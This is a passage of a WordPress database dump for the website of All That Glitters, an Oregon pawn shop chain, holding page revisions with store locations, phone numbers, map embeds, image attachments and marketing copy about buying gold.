02:30:33','',198,'http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/Gold_Diamond-Jewelry.jpg',0,'attachment','image/jpeg',0),(200,1,'2015-03-09 19:31:03','2015-03-10 02:31:03','','Loans','','publish','closed','closed','','loans','','','2015-03-10 17:18:05','2015-03-11 00:18:05','',0,'http://atgjewelry.com/fuze7/?post_type=slider&p=200',0,'slider','',0),(201,1,'2015-03-09 19:30:53','2015-03-10 02:30:53','dollar banks note money background','Dollar bank note money background','','inherit','open','open','','dollar-bank-note-money-background','','','2015-03-09 19:31:00','2015-03-10 02:31:00','',200,'http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/Loans.jpg',0,'attachment','image/jpeg',0),(228,2,'2015-03-10 16:08:18','2015-03-10 23:08:18','<div id=\"squares\"><a href=\"#\"><img src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/banner1.jpg\" alt=\"watch\" /></a><a href=\"#\"><img src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/banner2.jpg\" alt=\"watch\" /></a><a href=\"#\"><img src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/banner3.jpg\" alt=\"watch\" /></a></div>\r\n<h1 style=\"text-align: center;\">All That Glitters, Reinventing The Pawn Shop</h1>\r\n[row_fluid]\r\n[one_third]All of our pawn shops are designed with you, the customer, in mind. We strive to offer you an experience that will remind you more of an upscale retail store than a traditional pawn shop...and with our prices on merchandise and large selection, there\'s no reason to pay upscale retail prices again.[/one_third]\r\n[one_third]At All That Glitters, we believe that quality customer service is a direct result of qualified pawnbrokers working together for the common goal of presenting the public with high quality pre-owned products professionally displayed at prices well below retail.[/one_third]\r\n[one_third]\r\nAs our inventory is always changing, be sure and check back often to find that item you need at the price you can afford. At All That Glitters, there are no gimmicks, just good business.\r\n[/one_third]\r\n[/row_fluid]\r\n<h2><strong>Oregon Locations</strong></h2>\r\n<h4>[row]\r\n[span1][/span1]\r\n<strong>[span2]Portland</strong>\r\n<a href=\"https://www.google.com/maps/place/12200+SE+Division+St,+Portland,+OR+97236/@45.5038667,-122.5373076,17z/data=!3m1!4b1!4m2!3m1!1s0x5495a1c202f16d99:0xd11d950ef929fd57\" target=\"_blank\">12200 SE Division</a>\r\n503-761-9699[/span2]\r\n<strong>[span2]N. Portland</strong>\r\n<a href=\"https://www.google.com/maps/place/2932+N+Lombard+St,+Portland,+OR+97217/@45.576969,-122.6973386,17z/data=!3m1!4b1!4m2!3m1!1s0x5495a7bc5175458b:0x6a338a6c83521185\" target=\"_blank\">2932 N. Lombard</a>\r\n503-247-1019[/span2]\r\n<strong>[span2]Tigard</strong>\r\n<a href=\"https://www.google.com/maps/place/12760+SW+Pacific+Hwy,+Tigard,+OR+97223/@45.4270242,-122.7771537,17z/data=!3m1!4b1!4m2!3m1!1s0x54950d2478b9878b:0x8606ae6c36002c06\" target=\"_blank\">12760 SW Pacific Hwy</a>\r\n503-968-9510[/span2]\r\n<strong>[span2]Milwaukie</strong>\r\n<a href=\"https://www.google.com/maps/place/15114+SE+McLoughlin+Blvd,+Milwaukie,+OR+97267/@45.413827,-122.629546,17z/data=!3m1!4b1!4m2!3m1!1s0x5495745ed4b97ea3:0x718f1732179ebc6e\" target=\"_blank\">15114 SE McLoughlin</a>\r\n503-785-1168[/span2]\r\n<strong>[span2]Salem</strong>\r\n<a href=\"https://www.google.com/maps/place/1191+Lancaster+Dr+NE,+Salem,+OR+97301/@44.945026,-122.98391,17z/data=!3m1!4b1!4m2!3m1!1s0x54bffec2370440b3:0x851994b509c59f4b\" target=\"_blank\">1191 Lancaster Dr NE</a>\r\n503-362-9939[/span2]\r\n[span1][/span1]\r\n[/row]</h4>\r\n \r\n\r\n ','Home','','inherit','open','open','','48-revision-v1','','','2015-03-10 16:08:18','2015-03-10 23:08:18','',48,'http://atgjewelry.com/fuze7/48-revision-v1/',0,'revision','',0),(207,1,'2015-03-09 20:53:54','2015-03-10 03:53:54','<div id=\"squares\"><a href=\"#\"><img src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/banner1.jpg\" alt=\"watch\" /></a><a href=\"#\"><img src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/banner2.jpg\" alt=\"watch\" /></a><a href=\"#\"><img src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/banner3.jpg\" alt=\"watch\" /></a></div>\r\n<h1 style=\"text-align: center;\">All That Glitters, Reinventing The Pawn Shop</h1>\r\n[row_fluid]\r\n[one_third]All of our pawn shops are designed with you, the customer, in mind. We strive to offer you an experience that will remind you more of an upscale retail store than a traditional pawn shop...and with our prices on merchandise and large selection, there\'s no reason to pay upscale retail prices again.[/one_third]\r\n[one_third]At All That Glitters, we believe that quality customer service is a direct result of qualified pawnbrokers working together for the common goal of presenting the public with high quality pre-owned products professionally displayed at prices well below retail.[/one_third]\r\n[one_third]\r\nAs our inventory is always changing, be sure and check back often to find that item you need at the price you can afford. At All That Glitters, there are no gimmicks, just good business.\r\n[/one_third]\r\n[/row_fluid]\r\n<h2><strong>Oregon Locations</strong></h2>\r\n<h4>[row]\r\n[span1][/span1]\r\n<strong>[span2]S.E. Portland</strong>\r\n<a href=\"https://www.google.com/maps/place/12200+SE+Division+St,+Portland,+OR+97236/@45.5038667,-122.5373076,17z/data=!3m1!4b1!4m2!3m1!1s0x5495a1c202f16d99:0xd11d950ef929fd57\" target=\"_blank\">12200 SE Division</a>\r\n503-761-9699[/span2]\r\n<strong>[span2]N. Portland</strong>\r\n<a href=\"https://www.google.com/maps/place/2932+N+Lombard+St,+Portland,+OR+97217/@45.576969,-122.6973386,17z/data=!3m1!4b1!4m2!3m1!1s0x5495a7bc5175458b:0x6a338a6c83521185\" target=\"_blank\">2932 N. Lombard</a>\r\n503-247-1019[/span2]\r\n<strong>[span2]Tigard</strong>\r\n<a href=\"https://www.google.com/maps/place/12760+SW+Pacific+Hwy,+Tigard,+OR+97223/@45.4270242,-122.7771537,17z/data=!3m1!4b1!4m2!3m1!1s0x54950d2478b9878b:0x8606ae6c36002c06\" target=\"_blank\">12760 SW Pacific Hwy</a>\r\n503-968-9510[/span2]\r\n<strong>[span2]Milwaukie</strong>\r\n<a href=\"https://www.google.com/maps/place/15114+SE+McLoughlin+Blvd,+Milwaukie,+OR+97267/@45.413827,-122.629546,17z/data=!3m1!4b1!4m2!3m1!1s0x5495745ed4b97ea3:0x718f1732179ebc6e\" target=\"_blank\">15114 SE McLoughlin</a>\r\n503-785-1168[/span2]\r\n<strong>[span2]Salem</strong>\r\n<a href=\"https://www.google.com/maps/place/1191+Lancaster+Dr+NE,+Salem,+OR+97301/@44.945026,-122.98391,17z/data=!3m1!4b1!4m2!3m1!1s0x54bffec2370440b3:0x851994b509c59f4b\" target=\"_blank\">1191 Lancaster Dr NE</a>\r\n503-362-9939[/span2]\r\n[span1][/span1]\r\n[/row]</h4>\r\n \r\n\r\n<img class=\"alignleft size-medium wp-image-89\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie_outside-300x241.jpg\" alt=\"Milwaukie_outside\" width=\"300\" height=\"241\" />Lorem ipsum, morbi leo risus, porta ac conset\r\n\r\n</div>','Home','','inherit','open','open','','48-revision-v1','','','2015-03-09 20:53:54','2015-03-10 03:53:54','',48,'http://atgjewelry.com/fuze7/48-revision-v1/',0,'revision','',0),(202,1,'2015-03-09 20:27:21','2015-03-10 03:27:21','<div id=\"squares\"><a href=\"#\"><img src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/Citizen-Watch-BY2000-55W-1-300x300.png\" alt=\"watch\" /></a>\r\n<a href=\"#\"><img src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/Citizen-Watch-BY2000-55W-1-300x300.png\" alt=\"watch\" /></a>\r\n<a href=\"#\"><img src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/Citizen-Watch-BY2000-55W-1-300x300.png\" alt=\"watch\" /></a>\r\n<h1 style=\"text-align: center;\">All That Glitters, Reinventing The Pawn Shop</h1>\r\n[row_fluid]\r\n[one_third]All of our pawn shops are designed with you, the customer, in mind. We strive to offer you an experience that will remind you more of an upscale retail store than a traditional pawn shop...and with our prices on merchandise and large selection, there\'s no reason to pay upscale retail prices again.[/one_third]\r\n[one_third]At All That Glitters, we believe that quality customer service is a direct result of qualified pawnbrokers working together for the common goal of presenting the public with high quality pre-owned products professionally displayed at prices well below retail.[/one_third]\r\n[one_third]\r\nAs our inventory is always changing, be sure and check back often to find that item you need at the price you can afford. At All That Glitters, there are no gimmicks, just good business.\r\n[/one_third]\r\n[/row_fluid]\r\n<h2><strong>Oregon Locations</strong></h2>\r\n<h4>[row]\r\n[span1][/span1]\r\n<strong>[span2]S.E. Portland</strong>\r\n<a href=\"https://www.google.com/maps/place/12200+SE+Division+St,+Portland,+OR+97236/@45.5038667,-122.5373076,17z/data=!3m1!4b1!4m2!3m1!1s0x5495a1c202f16d99:0xd11d950ef929fd57\" target=\"_blank\">12200 SE Division</a>\r\n503-761-9699[/span2]\r\n<strong>[span2]N. Portland</strong>\r\n<a href=\"https://www.google.com/maps/place/2932+N+Lombard+St,+Portland,+OR+97217/@45.576969,-122.6973386,17z/data=!3m1!4b1!4m2!3m1!1s0x5495a7bc5175458b:0x6a338a6c83521185\" target=\"_blank\">2932 N. Lombard</a>\r\n503-247-1019[/span2]\r\n<strong>[span2]Tigard</strong>\r\n<a href=\"https://www.google.com/maps/place/12760+SW+Pacific+Hwy,+Tigard,+OR+97223/@45.4270242,-122.7771537,17z/data=!3m1!4b1!4m2!3m1!1s0x54950d2478b9878b:0x8606ae6c36002c06\" target=\"_blank\">12760 SW Pacific Hwy</a>\r\n503-968-9510[/span2]\r\n<strong>[span2]Milwaukie</strong>\r\n<a href=\"https://www.google.com/maps/place/15114+SE+McLoughlin+Blvd,+Milwaukie,+OR+97267/@45.413827,-122.629546,17z/data=!3m1!4b1!4m2!3m1!1s0x5495745ed4b97ea3:0x718f1732179ebc6e\" target=\"_blank\">15114 SE McLoughlin</a>\r\n503-785-1168[/span2]\r\n<strong>[span2]Salem</strong>\r\n<a href=\"https://www.google.com/maps/place/1191+Lancaster+Dr+NE,+Salem,+OR+97301/@44.945026,-122.98391,17z/data=!3m1!4b1!4m2!3m1!1s0x54bffec2370440b3:0x851994b509c59f4b\" target=\"_blank\">1191 Lancaster Dr NE</a>\r\n503-362-9939[/span2]\r\n[span1][/span1]\r\n[/row]</h4>\r\n \r\n\r\n<img class=\"alignleft size-medium wp-image-89\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie_outside-300x241.jpg\" alt=\"Milwaukie_outside\" width=\"300\" height=\"241\" />Lorem ipsum, morbi leo risus, porta ac conset\r\n\r\n</div>','Home','','inherit','open','open','','48-revision-v1','','','2015-03-09 20:27:21','2015-03-10 03:27:21','',48,'http://atgjewelry.com/fuze7/48-revision-v1/',0,'revision','',0),(203,1,'2015-03-09 20:32:10','2015-03-10 03:32:10','<div id=\"squares\"><a href=\"#\"><img src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/Citizen-Watch-BY2000-55W-1-300x300.png\" alt=\"watch\" /></a><a href=\"#\"><img src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/Citizen-Watch-BY2000-55W-1-300x300.png\" alt=\"watch\" /></a><a href=\"#\"><img src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/Citizen-Watch-BY2000-55W-1-300x300.png\" alt=\"watch\" /></a></div>\r\n<h1 style=\"text-align: center;\">All That Glitters, Reinventing The Pawn Shop</h1>\r\n[row_fluid]\r\n[one_third]All of our pawn shops are designed with you, the customer, in mind. We strive to offer you an experience that will remind you more of an upscale retail store than a traditional pawn shop...and with our prices on merchandise and large selection, there\'s no reason to pay upscale retail prices again.[/one_third]\r\n[one_third]At All That Glitters, we believe that quality customer service is a direct result of qualified pawnbrokers working together for the common goal of presenting the public with high quality pre-owned products professionally displayed at prices well below retail.[/one_third]\r\n[one_third]\r\nAs our inventory is always changing, be sure and check back often to find that item you need at the price you can afford. At All That Glitters, there are no gimmicks, just good business.\r\n[/one_third]\r\n[/row_fluid]\r\n<h2><strong>Oregon Locations</strong></h2>\r\n<h4>[row]\r\n[span1][/span1]\r\n<strong>[span2]S.E. Portland</strong>\r\n<a href=\"https://www.google.com/maps/place/12200+SE+Division+St,+Portland,+OR+97236/@45.5038667,-122.5373076,17z/data=!3m1!4b1!4m2!3m1!1s0x5495a1c202f16d99:0xd11d950ef929fd57\" target=\"_blank\">12200 SE Division</a>\r\n503-761-9699[/span2]\r\n<strong>[span2]N. Portland</strong>\r\n<a href=\"https://www.google.com/maps/place/2932+N+Lombard+St,+Portland,+OR+97217/@45.576969,-122.6973386,17z/data=!3m1!4b1!4m2!3m1!1s0x5495a7bc5175458b:0x6a338a6c83521185\" target=\"_blank\">2932 N. Lombard</a>\r\n503-247-1019[/span2]\r\n<strong>[span2]Tigard</strong>\r\n<a href=\"https://www.google.com/maps/place/12760+SW+Pacific+Hwy,+Tigard,+OR+97223/@45.4270242,-122.7771537,17z/data=!3m1!4b1!4m2!3m1!1s0x54950d2478b9878b:0x8606ae6c36002c06\" target=\"_blank\">12760 SW Pacific Hwy</a>\r\n503-968-9510[/span2]\r\n<strong>[span2]Milwaukie</strong>\r\n<a href=\"https://www.google.com/maps/place/15114+SE+McLoughlin+Blvd,+Milwaukie,+OR+97267/@45.413827,-122.629546,17z/data=!3m1!4b1!4m2!3m1!1s0x5495745ed4b97ea3:0x718f1732179ebc6e\" target=\"_blank\">15114 SE McLoughlin</a>\r\n503-785-1168[/span2]\r\n<strong>[span2]Salem</strong>\r\n<a href=\"https://www.google.com/maps/place/1191+Lancaster+Dr+NE,+Salem,+OR+97301/@44.945026,-122.98391,17z/data=!3m1!4b1!4m2!3m1!1s0x54bffec2370440b3:0x851994b509c59f4b\" target=\"_blank\">1191 Lancaster Dr NE</a>\r\n503-362-9939[/span2]\r\n[span1][/span1]\r\n[/row]</h4>\r\n \r\n\r\n<img class=\"alignleft size-medium wp-image-89\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie_outside-300x241.jpg\" alt=\"Milwaukie_outside\" width=\"300\" height=\"241\" />Lorem ipsum, morbi leo risus, porta ac conset\r\n\r\n</div>','Home','','inherit','open','open','','48-revision-v1','','','2015-03-09 20:32:10','2015-03-10 03:32:10','',48,'http://atgjewelry.com/fuze7/48-revision-v1/',0,'revision','',0),(204,1,'2015-03-09 20:52:46','2015-03-10 03:52:46','','banner2','','inherit','open','open','','banner2','','','2015-03-09 20:52:46','2015-03-10 03:52:46','',0,'http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/banner2.jpg',0,'attachment','image/jpeg',0),(205,1,'2015-03-09 20:52:49','2015-03-10 03:52:49','','banner3','','inherit','open','open','','banner3','','','2015-03-09 20:52:49','2015-03-10 03:52:49','',0,'http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/banner3.jpg',0,'attachment','image/jpeg',0),(206,1,'2015-03-09 20:52:54','2015-03-10 03:52:54','','banner1','','inherit','open','open','','banner1','','','2015-03-09 20:52:54','2015-03-10 03:52:54','',0,'http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/banner1.jpg',0,'attachment','image/jpeg',0),(209,2,'2015-03-10 11:43:01','2015-03-10 18:43:01','<div id=\"squares\"><a href=\"#\"><img src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/banner1.jpg\" alt=\"watch\" /></a><a href=\"#\"><img src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/banner2.jpg\" alt=\"watch\" /></a><a href=\"#\"><img src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/banner3.jpg\" alt=\"watch\" /></a></div>\r\n<h1 style=\"text-align: center;\">All That Glitters, Reinventing The Pawn Shop</h1>\r\n[row_fluid]\r\n[one_third]All of our pawn shops are designed with you, the customer, in mind. We strive to offer you an experience that will remind you more of an upscale retail store than a traditional pawn shop...and with our prices on merchandise and large selection, there\'s no reason to pay upscale retail prices again.[/one_third]\r\n[one_third]At All That Glitters, we believe that quality customer service is a direct result of qualified pawnbrokers working together for the common goal of presenting the public with high quality pre-owned products professionally displayed at prices well below retail.[/one_third]\r\n[one_third]\r\nAs our inventory is always changing, be sure and check back often to find that item you need at the price you can afford. At All That Glitters, there are no gimmicks, just good business.\r\n[/one_third]\r\n[/row_fluid]\r\n<h2><strong>Oregon Locations</strong></h2>\r\n<h4>[row]\r\n[span1][/span1]\r\n<strong>[span2]Portland</strong>\r\n<a href=\"https://www.google.com/maps/place/12200+SE+Division+St,+Portland,+OR+97236/@45.5038667,-122.5373076,17z/data=!3m1!4b1!4m2!3m1!1s0x5495a1c202f16d99:0xd11d950ef929fd57\" target=\"_blank\">12200 SE Division</a>\r\n503-761-9699[/span2]\r\n<strong>[span2]N. Portland</strong>\r\n<a href=\"https://www.google.com/maps/place/2932+N+Lombard+St,+Portland,+OR+97217/@45.576969,-122.6973386,17z/data=!3m1!4b1!4m2!3m1!1s0x5495a7bc5175458b:0x6a338a6c83521185\" target=\"_blank\">2932 N. Lombard</a>\r\n503-247-1019[/span2]\r\n<strong>[span2]Tigard</strong>\r\n<a href=\"https://www.google.com/maps/place/12760+SW+Pacific+Hwy,+Tigard,+OR+97223/@45.4270242,-122.7771537,17z/data=!3m1!4b1!4m2!3m1!1s0x54950d2478b9878b:0x8606ae6c36002c06\" target=\"_blank\">12760 SW Pacific Hwy</a>\r\n503-968-9510[/span2]\r\n<strong>[span2]Milwaukie</strong>\r\n<a href=\"https://www.google.com/maps/place/15114+SE+McLoughlin+Blvd,+Milwaukie,+OR+97267/@45.413827,-122.629546,17z/data=!3m1!4b1!4m2!3m1!1s0x5495745ed4b97ea3:0x718f1732179ebc6e\" target=\"_blank\">15114 SE McLoughlin</a>\r\n503-785-1168[/span2]\r\n<strong>[span2]Salem</strong>\r\n<a href=\"https://www.google.com/maps/place/1191+Lancaster+Dr+NE,+Salem,+OR+97301/@44.945026,-122.98391,17z/data=!3m1!4b1!4m2!3m1!1s0x54bffec2370440b3:0x851994b509c59f4b\" target=\"_blank\">1191 Lancaster Dr NE</a>\r\n503-362-9939[/span2]\r\n[span1][/span1]\r\n[/row]</h4>\r\n \r\n\r\n<img class=\"alignleft size-medium wp-image-89\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie_outside-300x241.jpg\" alt=\"Milwaukie_outside\" width=\"300\" height=\"241\" />Lorem ipsum, morbi leo risus, porta ac conset','Home','','inherit','open','open','','48-revision-v1','','','2015-03-10 11:43:01','2015-03-10 18:43:01','',48,'http://atgjewelry.com/fuze7/48-revision-v1/',0,'revision','',0),(210,2,'2015-03-10 11:44:45','2015-03-10 18:44:45','A wall with vintage guitars hanging on display.','Vintage Guitars','','inherit','open','open','','vintage-guitars','','','2015-03-10 11:44:45','2015-03-10 18:44:45','',0,'http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/Many-Guitars-.jpg',0,'attachment','image/jpeg',0),(211,2,'2015-03-10 11:44:52','2015-03-10 18:44:52','','Guns','','inherit','open','open','','guns','','','2015-03-10 16:22:36','2015-03-10 23:22:36','',34,'http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/Guns.jpg',0,'attachment','image/jpeg',0),(212,2,'2015-03-10 12:00:34','2015-03-10 19:00:34','<h1 style=\"text-align: center;\"><strong>5 Oregon Locations, Open 7 Days a Week!</strong></h1>\r\n<h4 style=\"text-align: center;\"><strong>Monday - Saturday: 10:00 AM - 7:00 PM</strong></h4>\r\n<h4 style=\"text-align: center;\"><strong>Sunday: 11:00 AM - 5:00 PM</strong></h4>\r\n<strong>N. PORTLAND, OR: 2932 N. Lombard 503-247-1019</strong>\r\n[span4]\r\n<a class=\"thickbox\" href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Lombard-outside.jpg\"><img class=\"alignnone wp-image-154 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Lombard-outside-300x215.jpg\" alt=\"Lombard, All that Glitters\" width=\"300\" height=\"215\" /></a>\r\n\r\n[/span4]\r\n[span4]\r\n\r\n<a class=\"thickbox\" href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Lombard-inside.jpg\"><img class=\"alignnone wp-image-155 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Lombard-inside-300x215.jpg\" alt=\"Lombard, all that glitters\" width=\"300\" height=\"215\" /></a>\r\n[/span4]\r\n[span4]\r\n<iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d2792.6752415075734!2d-122.6973386!3d45.576969!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x5495a7bc5175458b%3A0x6a338a6c83521185!2s2932+N+Lombard+St%2C+Portland%2C+OR+97217!5e0!3m2!1sen!2sus!4v1424971890870\" width=\"400\" height=\"300\" frameborder=\"0\"></iframe>\r\n[/span4]\r\n<strong>PORTLAND, OR: 12200 SE Division 503-761-9699</strong>\r\n[span4]\r\n\r\n<a class=\"thickbox\" href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Division-outside.jpg\"><img class=\"alignnone wp-image-157 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Division-outside-300x221.jpg\" alt=\"Division, all that glitters\" width=\"300\" height=\"221\" /></a>[/span4]\r\n[span4]\r\n<a class=\"thickbox\" href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Division-inside.jpg\"><img class=\"alignnone wp-image-158 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Division-inside-300x215.jpg\" alt=\"Division inside, all that glitters\" width=\"300\" height=\"215\" /></a>\r\n[/span4]\r\n[span4]\r\n<iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d2796.308567804789!2d-122.53730759999999!3d45.503866699999996!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x5495a1c202f16d99%3A0xd11d950ef929fd57!2s12200+SE+Division+St%2C+Portland%2C+OR+97236!5e0!3m2!1sen!2sus!4v1424972011050\" width=\"400\" height=\"300\" frameborder=\"0\"></iframe>\r\n[/span4]\r\n<strong>MILWAUKIE, OR: 15114 SE McLoughlin 503-785-1168</strong>\r\n[span4]\r\n<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie_outside1.jpg\"><img class=\"alignnone size-medium wp-image-162\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie_outside1-300x215.jpg\" alt=\"Milwaukie, all that glitters\" width=\"300\" height=\"215\" /></a>\r\n[/span4]\r\n[span4]\r\n\r\n<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie_inside1.jpg\"><img class=\"alignnone size-medium wp-image-163\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie_inside1-300x215.jpg\" alt=\"Milwaukie, all that glitters\" width=\"300\" height=\"215\" /></a>[/span4]\r\n[span4]\r\n<iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d2800.7774589673077!2d-122.62954599999999!3d45.413827!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x5495745ed4b97ea3%3A0x718f1732179ebc6e!2s15114+SE+McLoughlin+Blvd%2C+Portland%2C+OR+97267!5e0!3m2!1sen!2sus!4v1424972438719\" width=\"400\" height=\"300\" frameborder=\"0\"></iframe>\r\n[/span4]\r\n<strong>TIGARD, OR: 12760 SW Pacific Hwy 503-761-9699</strong>\r\n[span4]\r\n\r\n<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Tigard-outside.jpg\"><img class=\"alignnone size-medium wp-image-165\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Tigard-outside-300x215.jpg\" alt=\"Tigard, all that glitters\" width=\"300\" height=\"215\" /></a>[/span4]\r\n[span4]\r\n\r\n<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Tigard-inside.jpg\"><img class=\"alignnone size-medium wp-image-166\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Tigard-inside-300x215.jpg\" alt=\"Tigard, all that glitters\" width=\"300\" height=\"215\" /></a>[/span4]\r\n[span4]\r\n<iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d2800.122881897304!2d-122.7771537!3d45.427024200000005!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x54950d2478b9878b%3A0x8606ae6c36002c06!2s12760+SW+Pacific+Hwy%2C+Tigard%2C+OR+97223!5e0!3m2!1sen!2sus!4v1424972494023\" width=\"400\" height=\"300\" frameborder=\"0\"></iframe>\r\n[/span4]\r\n<strong>SALEM, OR: 1191 Lancaster Dr. NE 503-362-9939</strong>\r\n[span4]\r\n\r\n<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Salem-outside.jpg\"><img class=\"alignnone size-medium wp-image-169\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Salem-outside-300x215.jpg\" alt=\"Salem, all that glitters\" width=\"300\" height=\"215\" /></a>[/span4]\r\n[span4]\r\n\r\n<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Salem-inside.jpg\"><img class=\"alignnone size-medium wp-image-168\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Salem-inside-300x215.jpg\" alt=\"Salem, all that glitters\" width=\"300\" height=\"215\" /></a>[/span4]\r\n[span4]\r\n<iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d2823.9331948345302!2d-122.98391!3d44.945026!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x54bffec2370440b3%3A0x851994b509c59f4b!2s1191+Lancaster+Dr+NE%2C+Salem%2C+OR+97301!5e0!3m2!1sen!2sus!4v1424972552736\" width=\"400\" height=\"300\" frameborder=\"0\"></iframe>\r\n[/span4]','Locations','','inherit','open','open','','83-revision-v1','','','2015-03-10 12:00:34','2015-03-10 19:00:34','',83,'http://atgjewelry.com/fuze7/83-revision-v1/',0,'revision','',0),(214,2,'2015-03-10 12:08:21','2015-03-10 19:08:21','','N. Lombard','','inherit','open','open','','n-lombard','','','2015-03-10 12:40:23','2015-03-10 19:40:23','',0,'http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/N.-Lombard.jpg',0,'attachment','image/jpeg',0),(215,2,'2015-03-10 14:44:17','2015-03-10 21:44:17','Closeup of gold jewelery with precious stones','Gold Jewelry','','inherit','open','open','','gold-jewelry-3','','','2015-03-10 16:30:24','2015-03-10 23:30:24','',39,'http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/Colored-Rings.jpg',0,'attachment','image/jpeg',0),(216,2,'2015-03-10 14:47:47','2015-03-10 21:47:47','','Gun Barrel','','inherit','open','open','','gun-barrel','','','2015-03-10 14:47:47','2015-03-10 21:47:47','',0,'http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/Gun-Barrel.jpg',0,'attachment','image/jpeg',0),(217,2,'2015-03-10 14:48:44','2015-03-10 21:48:44','Many electric guitars hanging on wall in the music instrument shop','Electric Guitar','','inherit','open','open','','electric-guitar','','','2015-03-10 16:23:03','2015-03-10 23:23:03','',34,'http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/Guitars-.jpg',0,'attachment','image/jpeg',0),(218,2,'2015-03-10 14:49:16','2015-03-10 21:49:16','Diamond ring on a black background','Diamond ring','','inherit','open','open','','diamond-ring','','','2015-03-10 14:49:16','2015-03-10 21:49:16','',0,'http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/Diamond-Rings.jpg',0,'attachment','image/jpeg',0),(219,2,'2015-03-10 14:50:16','2015-03-10 21:50:16','','Colored Stone Rings','','inherit','open','open','','colored-stone-rings','','','2015-03-10 14:50:16','2015-03-10 21:50:16','',0,'http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/Colored-Stone-Rings.jpg',0,'attachment','image/jpeg',0),(226,2,'2015-03-10 16:00:53','2015-03-10 23:00:53','[row_fluid]\r\n[one_half]\r\nYou can bring your gold, silver or platinum into any one of All That Glitters five convenient locations for a free assessment and cash offer. Our buyers will work to offer you the best cash price in town, and you can walk away with cash in hand in a matter of minutes.\r\n[/one_half]\r\n[one_half]\r\nWhy deal with the hassle and risk of mail order gold buyers when you can come into a state licensed legitimate local business and safely sell your unwanted gold? Come in today for a free evaluation of your unwanted jewelry items. Broken, missing stones we buy it all.\r\n[/one_half]\r\n[/row_fluid]','We Buy Gold','','inherit','open','open','','37-revision-v1','','','2015-03-10 16:00:53','2015-03-10 23:00:53','',37,'http://atgjewelry.com/fuze7/37-revision-v1/',0,'revision','',0),(220,2,'2015-03-10 15:51:01','2015-03-10 22:51:01','<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/Gold_Diamond-Jewelry.jpg\"><img class=\"alignright size-medium wp-image-199\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/Gold_Diamond-Jewelry-300x100.jpg\" alt=\"Gold and Diamond jewelry\" width=\"300\" height=\"100\" /></a>[row_fluid]\r\n[one_half]\r\nYou can bring your gold, silver or platinum into any one of All That Glitters five convenient locations for a free assessment and cash offer. Our buyers will work to offer you the best cash price in town, and you can walk away with cash in hand in a matter of minutes.\r\n[/one_half]\r\n[one_half]\r\nWhy deal with the hassle and risk of mail order gold buyers when you can come into a state licensed legitimate local business and safely sell your unwanted gold? Come in today for a free evaluation of your 